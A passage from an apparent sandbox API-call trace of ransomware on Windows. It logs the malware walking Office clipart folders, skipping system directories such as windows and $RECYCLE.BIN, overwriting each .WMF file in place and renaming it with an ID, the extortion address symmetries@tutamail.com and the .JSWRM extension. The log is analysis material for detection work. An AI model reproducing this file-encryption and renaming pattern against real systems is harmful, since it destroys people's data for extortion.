lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105414.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105414.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0081.464] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2473c0 | out: hHeap=0x1e0000) returned 1 [0081.464] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0081.464] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0081.464] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe67776a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe67776a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe67776a, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x4928, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0105490.WMF", cAlternateFileName="")) returned 1 [0081.464] lstrcmpiW (lpString1="J0105490.WMF", lpString2=".") returned 1 [0081.464] lstrcmpiW (lpString1="J0105490.WMF", lpString2="..") returned 1 [0081.464] lstrcmpiW (lpString1="J0105490.WMF", lpString2="...") returned 1 [0081.464] lstrcmpiW (lpString1="J0105490.WMF", lpString2="windows") returned -1 [0081.464] lstrcmpiW (lpString1="J0105490.WMF", lpString2="recovery") returned -1 [0081.464] lstrcmpiW (lpString1="J0105490.WMF", lpString2="perflogs") returned -1 [0081.464] lstrcmpiW (lpString1="J0105490.WMF", lpString2="documents and settings") returned 1 [0081.464] lstrcmpiW (lpString1="J0105490.WMF", lpString2="$RECYCLE.BIN") returned 1 [0081.464] lstrcmpiW (lpString1="J0105490.WMF", lpString2="system volume information") returned -1 [0081.464] lstrcmpiW (lpString1="J0105490.WMF", lpString2="msocache") returned -1 [0081.464] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0081.464] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0105490.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0081.464] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0105490.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0105490.WMF", lpUsedDefaultChar=0x0) returned 12 [0081.464] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0081.464] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0081.465] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0105490.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0081.465] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0105490.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0105490.WMF", lpUsedDefaultChar=0x0) returned 12 [0081.465] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0081.465] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210d38 [0081.465] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0081.465] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0081.465] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0081.465] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ad8 [0081.465] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105490.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105490.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0081.466] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=18728) returned 1 [0081.466] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0081.466] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x4920) returned 0x24d210 [0081.466] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x4920, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x4920, lpOverlapped=0x0) returned 1 [0081.468] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0081.469] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x4920, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x4920, lpOverlapped=0x0) returned 1 [0081.469] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0081.469] CloseHandle (hObject=0x314) returned 1 [0081.469] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210c08 [0081.469] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0081.469] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0081.469] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0081.469] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0081.469] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0081.469] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0081.469] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a408 [0081.469] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a408, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0081.469] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a408 | out: hHeap=0x1e0000) returned 1 [0081.469] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23da70 [0081.469] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247b80 [0081.469] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23da70 | out: hHeap=0x1e0000) returned 1 [0081.469] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0081.469] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105490.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105490.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105490.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105490.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0081.470] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247b80 | out: hHeap=0x1e0000) returned 1 [0081.470] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210c08 | out: hHeap=0x1e0000) returned 1 [0081.470] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ad8 | out: hHeap=0x1e0000) returned 1 [0081.470] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe67776a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe67776a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe67776a, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1424, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0105496.WMF", cAlternateFileName="")) returned 1 [0081.470] lstrcmpiW (lpString1="J0105496.WMF", lpString2=".") returned 1 [0081.470] lstrcmpiW (lpString1="J0105496.WMF", lpString2="..") returned 1 [0081.470] lstrcmpiW (lpString1="J0105496.WMF", lpString2="...") returned 1 [0081.470] lstrcmpiW (lpString1="J0105496.WMF", lpString2="windows") returned -1 [0081.470] lstrcmpiW (lpString1="J0105496.WMF", lpString2="recovery") returned -1 [0081.470] lstrcmpiW (lpString1="J0105496.WMF", lpString2="perflogs") returned -1 [0081.470] lstrcmpiW (lpString1="J0105496.WMF", lpString2="documents and settings") returned 1 [0081.470] lstrcmpiW (lpString1="J0105496.WMF", lpString2="$RECYCLE.BIN") returned 1 [0081.470] lstrcmpiW (lpString1="J0105496.WMF", lpString2="system volume information") returned -1 [0081.470] lstrcmpiW (lpString1="J0105496.WMF", lpString2="msocache") returned -1 [0081.470] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0081.470] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0105496.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0081.470] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0105496.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0105496.WMF", lpUsedDefaultChar=0x0) returned 12 [0081.470] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0081.470] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0081.470] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0105496.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0081.470] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0105496.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0105496.WMF", lpUsedDefaultChar=0x0) returned 12 [0081.471] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0081.471] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210158 [0081.471] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210d38 | out: hHeap=0x1e0000) returned 1 [0081.471] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0081.471] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0081.471] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0081.471] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105496.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105496.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0081.471] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=5156) returned 1 [0081.471] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0081.471] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1420) returned 0x205850 [0081.471] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x1420, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x1420, lpOverlapped=0x0) returned 1 [0081.473] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0081.473] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1420, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x1420, lpOverlapped=0x0) returned 1 [0081.473] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0081.473] CloseHandle (hObject=0x314) returned 1 [0081.473] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0081.473] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0081.473] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0081.473] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0081.473] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0081.473] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0081.473] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0081.473] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a210 [0081.473] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a210, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0081.473] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a210 | out: hHeap=0x1e0000) returned 1 [0081.473] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cd50 [0081.473] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247a88 [0081.473] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cd50 | out: hHeap=0x1e0000) returned 1 [0081.473] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0081.473] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105496.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105496.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105496.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105496.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0081.474] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247a88 | out: hHeap=0x1e0000) returned 1 [0081.474] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0081.474] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0081.474] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe651537, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe651537, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe67776a, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1560, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0105502.WMF", cAlternateFileName="")) returned 1 [0081.474] lstrcmpiW (lpString1="J0105502.WMF", lpString2=".") returned 1 [0081.474] lstrcmpiW (lpString1="J0105502.WMF", lpString2="..") returned 1 [0081.474] lstrcmpiW (lpString1="J0105502.WMF", lpString2="...") returned 1 [0081.474] lstrcmpiW (lpString1="J0105502.WMF", lpString2="windows") returned -1 [0081.475] lstrcmpiW (lpString1="J0105502.WMF", lpString2="recovery") returned -1 [0081.475] lstrcmpiW (lpString1="J0105502.WMF", lpString2="perflogs") returned -1 [0081.475] lstrcmpiW (lpString1="J0105502.WMF", lpString2="documents and settings") returned 1 [0081.475] lstrcmpiW (lpString1="J0105502.WMF", lpString2="$RECYCLE.BIN") returned 1 [0081.475] lstrcmpiW (lpString1="J0105502.WMF", lpString2="system volume information") returned -1 [0081.475] lstrcmpiW (lpString1="J0105502.WMF", lpString2="msocache") returned -1 [0081.475] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241218 [0081.475] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0105502.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0081.475] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0105502.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0105502.WMF", lpUsedDefaultChar=0x0) returned 12 [0081.475] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241218 | out: hHeap=0x1e0000) returned 1 [0081.475] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241218 [0081.475] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0105502.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0081.475] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0105502.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0105502.WMF", lpUsedDefaultChar=0x0) returned 12 [0081.475] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241218 | out: hHeap=0x1e0000) returned 1 [0081.475] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210d38 [0081.475] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210158 | out: hHeap=0x1e0000) returned 1 [0081.475] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0081.475] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0081.475] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0081.475] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105502.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105502.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0081.475] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=5472) returned 1 [0081.475] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0081.475] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1560) returned 0x205850 [0081.475] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x1560, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x1560, lpOverlapped=0x0) returned 1 [0081.477] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0081.477] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1560, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x1560, lpOverlapped=0x0) returned 1 [0081.477] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0081.477] CloseHandle (hObject=0x314) returned 1 [0081.478] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ad8 [0081.478] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0081.478] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0081.478] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0081.478] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0081.478] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0081.478] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0081.478] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3a8 [0081.478] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3a8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0081.478] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3a8 | out: hHeap=0x1e0000) returned 1 [0081.478] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cff0 [0081.478] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2476a8 [0081.478] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cff0 | out: hHeap=0x1e0000) returned 1 [0081.478] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0081.478] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105502.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105502.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105502.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105502.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0081.479] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2476a8 | out: hHeap=0x1e0000) returned 1 [0081.479] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ad8 | out: hHeap=0x1e0000) returned 1 [0081.479] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0081.479] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe651537, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe651537, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe651537, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1034, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0105504.WMF", cAlternateFileName="")) returned 1 [0081.479] lstrcmpiW (lpString1="J0105504.WMF", lpString2=".") returned 1 [0081.479] lstrcmpiW (lpString1="J0105504.WMF", lpString2="..") returned 1 [0081.479] lstrcmpiW (lpString1="J0105504.WMF", lpString2="...") returned 1 [0081.479] lstrcmpiW (lpString1="J0105504.WMF", lpString2="windows") returned -1 [0081.479] lstrcmpiW (lpString1="J0105504.WMF", lpString2="recovery") returned -1 [0081.479] lstrcmpiW (lpString1="J0105504.WMF", lpString2="perflogs") returned -1 [0081.479] lstrcmpiW (lpString1="J0105504.WMF", lpString2="documents and settings") returned 1 [0081.479] lstrcmpiW (lpString1="J0105504.WMF", lpString2="$RECYCLE.BIN") returned 1 [0081.479] lstrcmpiW (lpString1="J0105504.WMF", lpString2="system volume information") returned -1 [0081.479] lstrcmpiW (lpString1="J0105504.WMF", lpString2="msocache") returned -1 [0081.479] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0081.479] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0105504.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 